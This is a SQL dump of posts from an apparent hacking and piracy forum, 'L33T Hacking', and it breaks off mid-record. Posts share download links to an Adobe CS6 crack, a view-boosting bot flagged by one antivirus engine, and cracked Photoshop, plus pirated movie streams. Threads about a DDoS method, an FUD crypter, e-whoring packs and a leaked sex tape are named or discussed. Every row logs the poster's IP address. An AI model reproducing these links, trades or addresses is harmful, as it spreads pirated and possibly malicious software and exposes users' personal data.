VALUES('6997', '1170', '6839', '63', 'RE: Need a sig', '0', '4', 'Triple H', '1352006725', 'Thanks for the sig ipod. By when can i expect the sig?', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '50a87a67d10b099aa87a408851c83da9', '0', '0'); INSERT INTO mybb_posts VALUES('6998', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '4', 'Triple H', '1352006927', 'Thanks im going to watch it because it looks useful', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', '63d1c8a981d8672831f97cd0efff074f', '0', '0'); INSERT INTO mybb_posts VALUES('6999', '1188', '0', '35', '[Crack] Adobe CS6 Programs', '0', '9', 'p420', '1352007007', 'Hey,\r\n\r\nI just found this, it\'s a trick to get any CS6 programs for free.\r\n\r\n[list=1]\r\n[*]Look if the Adobe program is in Program Files or in Program Files (x86)\r\n[*]When it\'s the Program Files(x86) folder or you have a 32 bit system, copy the 32 file in your program folder\r\n[*]If it\'s in the normal program folder and you have an 64 bit system, copy the 64 bit file into your folder\r\n[*]If you get any errors, just switch the 32 to the 64 or the 64 to the 32 file\r\n[/list]\r\n\r\nDownload:\r\n\r\n[url=http://www.mediafire.com/?g10rtpwxtekqes6]32 Bit[/url]\r\n[url=http://www.mediafire.com/?adnftaa4j0lld80]64 Bit[/url]\r\n\r\nVirusscan:\r\n\r\n[url=https://www.virustotal.com/file/4510d123faef2f03f8ac8287a6dab8cf2edd6f5477a078f24c7d96487566e8f9/analysis/1350734067/]32 Bit[/url]\r\n[url=https://www.virustotal.com/file/304888a41f35c86c713540d8459504e13d24153716bf4659b587f7d4835d202e/analysis/1350734237/]64 Bit[/url]\r\n\r\nCheers', '173.245.64.95', '-1376436129', '0', '0', '0', '0', '1', '772bc4e843f3e04b2280116664d9e2dd', '0', '0'); INSERT INTO mybb_posts VALUES('7000', '1189', '0', '15', '?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '9', 'p420', '1352007238', 'I\'m giving away this EnhanceViews Credit Bot I bought a couple weeks ago. This bot is a little different than the one Isolate is giving away, because this version is a bit newer [5.8]. This bot doesn\'t freeze as much when boosting credits, and has a few more features I believe.\n\n[img]http://i.imgur.com/lRJyK.png[/img]\n\n[img]http://i.imgur.com/9zBrT.png[/img]\n\n[b]Download[/b]\n\n[lock][url=http://www.mediafire.com/?k9cvkoiwsva9vv7][b]Please Click Here[/b][/url][/lock]\n\n[b]VT Scan [/b]\n\n[url]https://www.virustotal.com/file/b323d07ba1c4bb8fd3d106de36cdb5b8dcb8e7a494d4ca1721099d4783fcf88c/analysis/1351865838/[/url]\n\nEnjoy Guys', '173.245.64.95', '-1376436129', '0', '0', '1', '1352010546', '1', 'd472db78296623c3400f7e45d87aa7c4', '0', '1352010546'); INSERT INTO mybb_posts VALUES('7001', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '9', 'p420', '1352007952', 'Thanks didn\'t know about this.', '173.245.64.95', '-1376436129', '0', '0', '0', '0', '1', '18ab075cbb20e20a8ead624ec6798134', '0', '0'); INSERT INTO mybb_posts VALUES('7002', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '1', 't3h jok3r', '1352009782', 'Timmy you can release it in the public sections.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '758f2afa6bc6a16b5f19fa4225deb1f4', '0', '0'); INSERT INTO mybb_posts VALUES('7003', '1169', '6982', '3', 'RE: Computing Tab Forum Suggestions', '0', '1', 't3h jok3r', '1352009860', '[quote=\'NXK\' pid=\'6982\' dateline=\'1351960987\']\nI look forward to expanding this section :)\n[/quote]\n\nWhich section are you talking about?', '72.231.24.165', '1223104677', '1', '0', '1', '1352009877', '1', 'a46c8d5128414f514c04c5721b97b4da', '0', '1352009877'); INSERT INTO mybb_posts VALUES('7004', '1190', '0', '3', 'New Rule', '0', '1', 't3h jok3r', '1352010460', 'I have added a new rule in which we recommend everyone to use the lock mycode in every thread that contains a download link to hide the download link. After someone posts the poster would be able to see the download link. [u]You may not use this code in the upgraded section.[/u] Oh yeah I also took out time to fix the bug in which all the links were getting locked. Now only the content between the lock mycodes will be hidden.\n\n[b]Why did I implement this?[/b]\n\nThis will keep leechers out.\n\n[b]How would this keep leechers out when they can post and get the link?[/b]\n\nThat\'s correct, they can post and still get the link BUT then we would know who posted so we have a rough idea who leaked the thread. If they delete their post then it would be more easier for us to investigate and ban the leecher and have them banned on the site they leaked the thread on. This would either stop from posting/leeching or if they do post then they would get banned from both sides so they can\'t leech AT ALL.\n\n[size=large][b]THERE\'S A DIFFERENCE[/b][/size]\n\nThere\'s a difference between \"post here and pm me\" and post here to unlock content. \n\n[b]How to use this mycode?[/b]\n\n[code]\n[lock]LINK HERE[/lock]\n[/code]\n\nShould look like this\n\n[lock]Hi there![/lock]\n\nLink to Rules: http://l33thacking.net/misc.php?action=help&hid=8\n\nHope you all enjoy this update!', '72.231.24.165', '1223104677', '1', '0', '1', '1352010813', '1', 'b6970b2a26f8f24b5fe689286b6b992e', '0', '1352010813'); INSERT INTO mybb_posts VALUES('7005', '964', '5433', '19', '[Junk][UPDATED] L33T Hacking Skype Resolver', '0', '1', 't3h jok3r', '1352011206', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('7006', '770', '3945', '19', '[Junk]Gyzano JDB', '0', '1', 't3h jok3r', '1352011253', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('7007', '289', '2097', '15', 'RE: UploadNSell Exploit Program', '0', '1', 't3h jok3r', '1352011827', '[quote=\'iTzIpod\' pid=\'2097\' dateline=\'1347743128\']\r\nUghh. Keep on getting the 1 month XBL thing.. \r\nIt\'s just a text file saying that he needs to PM him about it or something -.-\r\n[/quote]\r\n\r\nIt could be because everytime there\'s a new upload it gives that uploads download code. It can sometimes can hours to get another code.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '25ab395a2f7542a2ff7fd9056cc80678', '0', '0'); INSERT INTO mybb_posts VALUES('7008', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '5', 'Timmy', '1352012601', 'I\'ll release it tomorrow or something. Can\'t believe so many people are interested ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5494249f4f7d1896841b4fb91e61953c', '0', '0'); INSERT INTO mybb_posts VALUES('7009', '1190', '7004', '3', 'RE: New Rule', '0', '5', 'Timmy', '1352012764', 'Nice rule. It\'s useful and you did the right thing but doing this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bb09e6aa6c1ddfe9c8e31bc5de9e6e09', '0', '0'); INSERT INTO mybb_posts VALUES('7010', '1190', '7004', '3', 'RE: New Rule', '0', '7', 'Romdu62', '1352012940', 'Not a bad update we had this before and i wish this keeps the leechers out.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'fe6e72b73699acaf33e265f9464c0e43', '0', '0'); INSERT INTO mybb_posts VALUES('7012', '1176', '6899', '47', 'RE: Free .asia domain', '0', '84', 'Thunder™', '1352013443', '[quote=\'Apathy\' pid=\'6899\' dateline=\'1351823873\']\r\nAlready seen this but nice share anyway. Thanks.\r\n[/quote]\r\n\r\nGlad u Like it.', '111.91.75.233', '1868254185', '0', '0', '0', '0', '1', '883279b9babc4ca148325e05832c6476', '0', '0'); INSERT INTO mybb_posts VALUES('7013', '1149', '6722', '20', 'RE: [AutoIt] [JY]-R00t Crypter| FUD[USB Spread & sRootKite]ByPass SandBoxie & VM\'s', '0', '316', 'luc1f3r.n008', '1352018424', 'thnx a lot............working fine.....does it will add the server to startup??or i should do it while crating server?????', '106.206.163.177', '1791927217', '0', '0', '0', '0', '1', '241efcc666ef8a27ce98604bc4b4cdac', '0', '0'); INSERT INTO mybb_posts VALUES('7014', '1191', '0', '54', '[4 nov]HUGE MIXXX OF WORKING PASSES FOR 4.NOV.2012', '0', '255', 'sbhshroy2', '1352024025', 'http://adfoc.us/7433112009828', '112.110.2.168', '1886257832', '0', '0', '0', '0', '1', 'c55df4a05ba0e62b01956551714ffbea', '0', '0'); INSERT INTO mybb_posts VALUES('7015', '989', '6823', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '258', 'PiXEL^OG', '1352025622', '[quote=\'t3h jok3r\' pid=\'6823\' dateline=\'1351747521\']\r\nAlready knew about this because I made a proxy with this once. Thanks for sharing, it\'s useful and I believe 98% of proxies out on the internet are glype proxy.\r\n[/quote]\r\n\r\nNot really , the more well known ones are scripts coded by the owner himself.\r\n\r\nBut Glype proxy gets detected and removed real fast from most web hosts so in order to get around that all you do is Obfuscate your PHP files', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'c04b7c81bacf1eb1ccc3a98663108a1a', '0', '0'); INSERT INTO mybb_posts VALUES('7016', '1190', '7004', '3', 'RE: New Rule', '0', '228', 'VirtualLegend', '1352030202', 'Yeah Finally, This will help the forum alot', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '8fcac67198607f4119ba290fa98c2ed1', '0', '0'); INSERT INTO mybb_posts VALUES('7017', '203', '6969', '16', 'RE: [Limited] Free SEing Help', '0', '228', 'VirtualLegend', '1352030390', '[quote=\'iTzIpod\' pid=\'6969\' dateline=\'1351949257\']\r\nYou can.\r\n\r\nUpdate.\r\nI\'m kinda busy right now. Got a History project due on Thursday.\r\n[/quote]\r\n\r\nNo Problem bro, just contact me when you have time', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '092ec2a70677001ee5372072d8d746c2', '0', '0'); INSERT INTO mybb_posts VALUES('7018', '1190', '7004', '3', 'RE: New Rule', '0', '62', 'R?????zo?', '1352033401', 'Nice rule thanks for this. :D\nKeeps leechers away and more post count for us, double win!', '94.132.244.168', '1585771688', '1', '0', '62', '1352033431', '1', 'b8fac4f3917c2d03f5d62dffca2d0dde', '0', '1352033431'); INSERT INTO mybb_posts VALUES('7019', '1187', '6989', '7', 'RE: L33T Hacking keywords', '0', '205', 'mothered', '1352033922', '[quote=\'t3h jok3r\' pid=\'6989\' dateline=\'1351984630\']\r\n\r\n\r\nThis won\'t build any backlinks but yes this will increase our keywords. I think the thread itself is enough.\r\n[/quote]\r\n\r\nAbsolutely agree.\r\n\r\nAs long as the thread remains as Is, It\'ll suffice.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '108c653551bdb7d68af32394e6990d34', '0', '0'); INSERT INTO mybb_posts VALUES('7020', '1190', '7004', '3', 'RE: New Rule', '0', '205', 'mothered', '1352034171', 'I fully support this.\r\n\r\nThere\'s just too many leechers, and this\'ll certainly deter most of them.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5c881dcbde89a1ab992159b3fbbfcf27', '0', '0'); INSERT INTO mybb_posts VALUES('7057', '1197', '7050', '4', 'RE: Perfection', '0', '54', 'Sin Cara', '1352180733', 'Welcome to LH.......\nStay active and read rules before posting.', '119.154.5.194', '2006582722', '1', '0', '0', '0', '1', 'd6b7422b78bb0c527fe8dd4399f462fa', '0', '0'); INSERT INTO mybb_posts VALUES('7022', '959', '6845', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '82', 'iTzIpod', '1352038608', '[quote=\'t3h jok3r\' pid=\'6845\' dateline=\'1351753069\']\r\n[quote=\'iTzIpod\' pid=\'5435\' dateline=\'1350595297\']\r\nI know the creator of Customhits.net :3\r\n\r\n\r\n\r\nVery nice method. Tried it. Didn\'t work :p Lool\r\n[/quote]\r\n\r\nIt seriously didn\'t work or are you joking?\r\n[/quote]\r\n\r\nIt seriously didn\'t work. I have 27k Coins and put them to 5 CPC. And only gained like 12 views in like 2 days ._. \r\nIt\'s just pure luck on how much people are using it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee7ef6be364679eb9a5a9809a0e359ca', '0', '0'); INSERT INTO mybb_posts VALUES('7023', '1190', '7004', '3', 'RE: New Rule', '0', '82', 'iTzIpod', '1352038934', 'I\'ve noticed some of our content being leaked on LF. Still it\'s being leaked/leeched. But thanks for the update.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '088b4076d70efd11e13a3af4378b6e1e', '0', '0'); INSERT INTO mybb_posts VALUES('7024', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1352038974', 'Okay. Thanks for your patience.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '276f82b15260ef9e764970afa191bb0d', '0', '0'); INSERT INTO mybb_posts VALUES('7025', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '82', 'iTzIpod', '1352039038', 'Didn\'t know about this but oh well. Can t3h jok3r confirm of this?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc647147b23554930bc609f53b588497', '0', '0'); INSERT INTO mybb_posts VALUES('7026', '1189', '7000', '15', 'RE: ?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '82', 'iTzIpod', '1352039085', 'Is it safe and you verified it\'s safe?\nOr should I still run it in Sandboxie? \nVirus Scan is 1/41. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8d45f68feec47c9fa565580b2673607d', '0', '0'); INSERT INTO mybb_posts VALUES('7027', '1170', '6839', '63', 'RE: Need a sig', '0', '82', 'iTzIpod', '1352039248', 'I\'m making it. Please be patient. :/\n[hr]\n[img]http://i.imgur.com/sfsgT.png[/img]\n[img]http://i.imgur.com/AOFLi.png[/img]\nI rushed these because I was very busy and you were rushing me. ._. Sorry if it\'s bad.', '24.212.197.164', '416597412', '1', '0', '82', '1352039958', '1', '23b4833163cbfa5e1d49921c85a6bd16', '0', '0'); INSERT INTO mybb_posts VALUES('7028', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1352041323', 'Here\'s the DL link for Photoshop Portable CS4.\nNow I use this one so I guarantee there\'s no virus on it.\nDownload it before MediaFire removes it and also, sorry for the Adfoc link as the payday is November 7th and I want to maximize my profits. Sorry. :/\nEnjoy the file though.\nTook 30 minutes for me to upload due to my internet speed.\n\n10 minutes to add to .Rar, and 20 minutes to upload to MediaFire.\nEnjoy!\n\nLink:\nhttp://adfoc.us/9310512027814', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4126901ff7ef40c3a568b813ebcedd90', '0', '0'); INSERT INTO mybb_posts VALUES('7029', '1190', '7004', '3', 'RE: New Rule', '0', '61', 'NXK', '1352042216', 'Very glad to see this. Can\'t wait to see people use it :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '4f2b728ddb88e31e527b1895953c8ac1', '0', '0'); INSERT INTO mybb_posts VALUES('7030', '1189', '7000', '15', 'RE: ?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '228', 'VirtualLegend', '1352046168', 'Looks nice hope it will boost some views', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'c27be12d50c1b9d4d488763736e03c4d', '0', '0'); INSERT INTO mybb_posts VALUES('7031', '1187', '6961', '7', 'RE: L33T Hacking keywords', '0', '61', 'NXK', '1352046612', 'Seems like a good Idea, Hope it all works out. We need more members!', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '505b9ef3064f3106239bb42229ee27ab', '0', '0'); INSERT INTO mybb_posts VALUES('7032', '1190', '7004', '3', 'RE: New Rule', '0', '2', 'Apathy', '1352046775', 'This is a good change.', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', 'db2a1ad74a1f37d4d6385e188ec2f8e2', '0', '0'); INSERT INTO mybb_posts VALUES('7033', '1189', '7000', '15', 'RE: ?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '2', 'Apathy', '1352046845', 'Nice share I will give this a go. :P', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', '62265646a57e2a8c3678b9c81103df70', '0', '0'); INSERT INTO mybb_posts VALUES('7034', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '2', 'Apathy', '1352047726', 'Op did you actually write this?', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', 'be1caa7e8ec8d1ca110caa4efbcdaf8b', '0', '0'); INSERT INTO mybb_posts VALUES('7035', '959', '7034', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '53', 'sirchamp', '1352117967', '[quote=\'Apathy\' pid=\'7034\' dateline=\'1352047726\']\nOp did you actually write this?\n[/quote]\n\nOf course he didn\'t. This is on every single money making forum..', '188.155.56.90', '-1130678182', '1', '0', '53', '1352117978', '1', '2befe1d0b89c5e1d9d23214af5aa7357', '0', '1352117978'); INSERT INTO mybb_posts VALUES('7036', '1190', '7023', '3', 'RE: New Rule', '0', '1', 't3h jok3r', '1352133998', '[quote=\'iTzIpod\' pid=\'7023\' dateline=\'1352038934\']\r\nI\'ve noticed some of our content being leaked on LF. Still it\'s being leaked/leeched. But thanks for the update.\r\n[/quote]\r\n\r\nWho the heck is leaking my sites contents still? I thought I banned Kasual/Rave and NSA warned him already.\r\n\r\nCan you PM me or NXK links to the leaked content and from now on we would be able to take more accurate actions more effective and easily because now we know how viewed the specific thread.', '165.155.212.72', '-1516514232', '1', '0', '0', '0', '1', '7a199e43dc4ce79ca9993d11c14bf878', '0', '0'); INSERT INTO mybb_posts VALUES('7037', '1192', '0', '3', 'Name error', '0', '53', 'sirchamp', '1352142728', 'When I click on somebodys username to get on his profile I get an error.\r\n\"MyBB has experienced an internal SQL error and cannot continue.\r\n\r\nSQL Error:\r\n 1146 - Table \'removed.hidden.mybb_username_history\' doesn\'t exist\r\nQuery:\r\n SELECT COUNT(id) AS changes FROM mybb_username_history WHERE uid=\'53\' \"', '188.155.56.90', '-1130678182', '1', '0', '1', '1352144705', '1', '316741edc3ca2e39d8ea0de882b62cf1', '0', '1352144705'); INSERT INTO mybb_posts VALUES('7038', '1192', '7037', '3', 'RE: Name error', '0', '82', 'iTzIpod', '1352146628', 'I\'m experiencing this error too! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4489dbe68c2363d5e4d4e6a949c1c07e', '0', '0'); INSERT INTO mybb_posts VALUES('7039', '1192', '7037', '3', 'RE: Name error', '0', '228', 'VirtualLegend', '1352151964', 'Me Too, and i thought it was just me :P', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'e2fc0e7d42d077e48ca274629d0ac24b', '0', '0'); INSERT INTO mybb_posts VALUES('7040', '1190', '7036', '3', 'RE: New Rule', '0', '82', 'iTzIpod', '1352158588', '[quote=\'t3h jok3r\' pid=\'7036\' dateline=\'1352133998\']\r\n[quote=\'iTzIpod\' pid=\'7023\' dateline=\'1352038934\']\r\nI\'ve noticed some of our content being leaked on LF. Still it\'s being leaked/leeched. But thanks for the update.\r\n[/quote]\r\n\r\nWho the heck is leaking my sites contents still? I thought I banned Kasual/Rave and NSA warned him already.\r\n\r\nCan you PM me or NXK links to the leaked content and from now on we would be able to take more accurate actions more effective and easily because now we know how viewed the specific thread.\r\n[/quote]\r\n\r\nSure. When I see some more, I\'ll report it. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4ac2070119dbbf960a895637607afa73', '0', '0'); INSERT INTO mybb_posts VALUES('7041', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '306', 'CommandoModz', '1352160576', 'This is a VERY simple and WORKING tutorial! Great job kid! Keep them coming! :)', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', 'f40ebffdfb088308602ff870841806d5', '0', '0'); INSERT INTO mybb_posts VALUES('7042', '1194', '0', '4', 'moruzaks in the building', '0', '323', 'moruzaks', '1352161212', 'sup house... thanks all yall for having me in the house..... i look forward to know and understand more about hacking from the professional in the house....', '196.46.245.49', '-1003555535', '0', '0', '0', '0', '1', '6489adfec0559595cb0721599cbfd445', '0', '0'); INSERT INTO mybb_posts VALUES('7043', '1194', '7042', '4', 'RE: moruzaks in the building', '0', '61', 'NXK', '1352165285', 'Glad to see you want to learn. Welcome I hope you enjoy it here.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '992a5e878458d92aa667f1cde36efd98', '0', '0'); INSERT INTO mybb_posts VALUES('7044', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '323', 'moruzaks', '1352166314', 'SUP, i could not find the download link.... i would love to have the package...', '196.46.245.50', '-1003555534', '0', '0', '0', '0', '1', '0c8cf8978132d2b8c208f2d4e26daa5d', '0', '0'); INSERT INTO mybb_posts VALUES('7045', '1195', '0', '47', 'Premium Minecraft Accounts', '0', '324', 'Purps™', '1352172410', 'Hello I am giving away free premium Minecraft accounts. Just post here and I will PM you or if you can\'t wait just PM me. All who post will get one for sure! No accounts will be the same, but all premium, I manually check both accounts before giving them to you so they will work!', '67.181.154.90', '1135975002', '0', '0', '0', '0', '1', '7ed344edec452173c2fee05ea3568e18', '0', '0'); INSERT INTO mybb_posts VALUES('7046', '1192', '7037', '3', 'RE: Name error', '0', '205', 'mothered', '1352175476', 'All fine on my end.\r\n\r\nProbably just an error at the time with the DB.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4e441322b0fe2706ab816fc73948177e', '0', '0'); INSERT INTO mybb_posts VALUES('7047', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '205', 'mothered', '1352175673', 'Pertaining to the Computing category, probably a \"Hardware and Customization\" forum would be nice.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f366c765e9467b856ef1f8bd7799d8b8', '0', '0'); INSERT INTO mybb_posts VALUES('7048', '1196', '0', '7', 'Your favorite time of the year?', '0', '205', 'mothered', '1352176330', 'Greetings to all,\r\n\r\nWhether It be Christmas, birthday, Thanksgiving, religious related, Easter, New Year, etc, as the thread\'s title reads, what\'s your favorite time of the year?\r\n\r\nI don\'t really celebrate much, but mine Is Christmas, simply to catch up with family, and appreciate being together on that special day.\r\nYou guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd11ee0457aedbd0efc7d4d45ee641add', '0', '0'); INSERT INTO mybb_posts VALUES('7049', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '325', 'Perfection', '1352177234', 'Nice to see my post spreading around.', '107.204.89.253', '1808554493', '0', '0', '0', '0', '1', '7917bf2a1ec67d570eadf8374a3f818c', '0', '0'); INSERT INTO mybb_posts VALUES('7050', '1197', '0', '4', 'Perfection', '0', '325', 'Perfection', '1352177312', 'Hey guys, you might know me from HMSEF.\r\nI came from there and I want to check out this forum.\r\nLooks good.\r\nHope myself I will enjoy my stay.', '107.204.89.253', '1808554493', '0', '0', '0', '0', '1', 'eeee9388eff49ba350a3581a97aa9cf6', '0', '0'); INSERT INTO mybb_posts VALUES('7051', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '325', 'Perfection', '1352177414', 'Not gonna lie, this is pretty cool itself. \nNice tutorial.', '107.204.89.253', '1808554493', '0', '0', '0', '0', '1', 'f6270a38f699fa2f6b0da3d751c6794d', '0', '0'); INSERT INTO mybb_posts VALUES('7052', '1145', '7049', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '1', 't3h jok3r', '1352180107', '[quote=\'Perfection\' pid=\'7049\' dateline=\'1352177234\']\r\nNice to see my post spreading around.\r\n[/quote]\r\n\r\nYour welcome. Thanks to Mr. Undoubtable for allowing my member to only leak that post as it was also leaked onto HMSEF.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f18b675b2bdf983feb1235ad2ce23312', '0', '0'); INSERT INTO mybb_posts VALUES('7053', '1197', '7050', '4', 'RE: Perfection', '0', '1', 't3h jok3r', '1352180160', 'Welcome to L33T Hacking perfection.\n\nI have seen you on HMSEF, You are a great member and definitely a great addition to L33T Hacking. Thanks for joining and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '49c8cd5f019f12a48ecb13aa7679d024', '0', '0'); INSERT INTO mybb_posts VALUES('7054', '1194', '7042', '4', 'RE: moruzaks in the building', '0', '1', 't3h jok3r', '1352180237', 'Welcome to L33T Hacking moruzaks.\n\nThanks for joining and hope your enjoy your stay. If you don\'t mind, how did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd01357c0af4e63efa3f46c4a624c3625', '0', '0'); INSERT INTO mybb_posts VALUES('7055', '1192', '7046', '3', 'RE: Name error', '0', '1', 't3h jok3r', '1352180291', '[quote=\'mothered\' pid=\'7046\' dateline=\'1352175476\']\r\nAll fine on my end.\r\n\r\nProbably just an error at the time with the DB.\r\n[/quote]\r\n\r\nThere was an error with the DB but I fixed it when I was at school. I couldn\'t actually post because I was trying to avoid my teacher from catching me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '30368fb85cacbaf27f3d4daedde446ae', '0', '0'); INSERT INTO mybb_posts VALUES('7056', '1196', '7048', '7', 'RE: Your favorite time of the year?', '0', '1', 't3h jok3r', '1352180401', 'Honestly I use to like New Years because when I was in another country for 5 years I use to love celebrating with fireworks but unfortunately US doesn\'t allow fireworks so New Years is out for now.\n\nI think my favorite time is my birthday because then I go to different countries every year with all my relatives to celebrate my birthday.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a68a0016ad609d8b599d05fe29743e13', '0', '0'); INSERT INTO mybb_posts VALUES('7058', '234', '7044', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '1', 't3h jok3r', '1352180743', '[quote=\'moruzaks\' pid=\'7044\' dateline=\'1352166314\']\r\nSUP, i could not find the download link.... i would love to have the package...\r\n[/quote]\r\n\r\nSorry I lost the link. I had it saved but since no one posted for a long time I deleted the link. Sorry for the inconvenience.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'af6e6c6a90ade1642fe3ac2ee2099e12', '0', '0'); INSERT INTO mybb_posts VALUES('7059', '1190', '7040', '3', 'RE: New Rule', '0', '1', 't3h jok3r', '1352180798', '[quote=\'iTzIpod\' pid=\'7040\' dateline=\'1352158588\']\r\n[quote=\'t3h jok3r\' pid=\'7036\' dateline=\'1352133998\']\r\n[quote=\'iTzIpod\' pid=\'7023\' dateline=\'1352038934\']\r\nI\'ve noticed some of our content being leaked on LF. Still it\'s being leaked/leeched. But thanks for the update.\r\n[/quote]\r\n\r\nWho the heck is leaking my sites contents still? I thought I banned Kasual/Rave and NSA warned him already.\r\n\r\nCan you PM me or NXK links to the leaked content and from now on we would be able to take more accurate actions more effective and easily because now we know how viewed the specific thread.\r\n[/quote]\r\n\r\nSure. When I see some more, I\'ll report it. :D\r\n[/quote]\r\n\r\nThat\'s great. Thanks for reporting the leechers.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a5977d725d5563e3a2ae13a33794509d', '0', '0'); INSERT INTO mybb_posts VALUES('7060', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '9', 'p420', '1352181989', 'Going to watch skyfall. New 007(James Bond) movie :D', '173.245.64.95', '-1376436129', '0', '0', '0', '0', '1', '72a2b1b56871162c56cc77fa7732a292', '0', '0'); INSERT INTO mybb_posts VALUES('7061', '1198', '0', '64', 'Skyfall (2012) Movie RIP', '0', '9', 'p420', '1352183780', '[img]https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcTQiSoCXnEpQU3aI1fop5PkPnOWkAzKzgCYY0-o-OUyCbr91FDZwg[/img]\n\n[b]Genre:[/b] Action , Thriller , Crime , Adventure\n[b]Release:[/b] 8 November 2012\n[b]Length:[/b] 143 min \n[b]Rate:[/b] 82%\n[b]Description:[/b] Bond\'s loyalty to M is tested as her past comes back to haunt her. As MI6 comes under attack, 007 must track down and destroy the threat, no matter how personal the cost..\n\n[b]Links[/b]\n\nHQVIDEO: http://hqvideo.cc/pc/2352d833208309fc/\n\nWorldVid: http://worldvid.co/video/7380957f2ebaa6e827cc13984b94f50f/\n\nVidgang: http://vidgang.co/video/13ba81e1d47470f6c29b02bc686da03f/', '173.245.64.95', '-1376436129', '0', '0', '9', '1352183861', '1', '2760efcb4998aad83421c3143cc9f0a5', '0', '1352183861'); INSERT INTO mybb_posts VALUES('7062', '1199', '0', '64', 'Silent Hill: Revelation 3D (2012) Movie RIP', '0', '9', 'p420', '1352185232', 'Watch Silent Hill for free online on L33T Hacking.\r\n\r\n[b]Genre:[/b] Horror , Thriller , Mystery\r\n[b]Release:[/b] 31 October 2012\r\n[b]Length:[/b] 94 min \r\n[b]Rate:[/b] 70%\r\n[b]Description:[/b] When her father disappears, Heather Mason is drawn into a strange and terrifying alternate reality that holds answers to the horrific nightmares that have plagued her since childhood.\r\n\r\n[b]Links[/b]\r\n\r\nFleon: http://fleon.me/rc.php?Id=8fac812c06c3c66817bfe40684dacd9d\r\n\r\nHQVideo: http://hqvideo.cc/pc/22dea21819f8c47c/\r\n\r\nWorldvideo: http://worldvid.co/video/6318641c650c7695c8fb7be1811fae2a/\r\n\r\nVidgang: http://vidgang.co/video/fcc174ca874a6a895d8c0b68b44be670/', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1a75889c47b79a9cb398bb0af5c3cf23', '0', '0'); INSERT INTO mybb_posts VALUES('7063', '1200', '0', '65', '[Review] Skyfall 2012', '0', '9', 'p420', '1352185360', 'I watched Skyfall and it\'s a great movie. It\'s not released yet in US but I have posted a movie rip in the rips section. It\'s a great movie and one of the best 007 movies I believe, it was fun watching it and would recommend it to everyone.\r\n\r\nPost your reviews below.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e173a38dc6e73799df8ee41d219bb929', '0', '0'); INSERT INTO mybb_posts VALUES('7064', '1201', '0', '64', 'Sinister Movie Rip', '0', '9', 'p420', '1352186162', 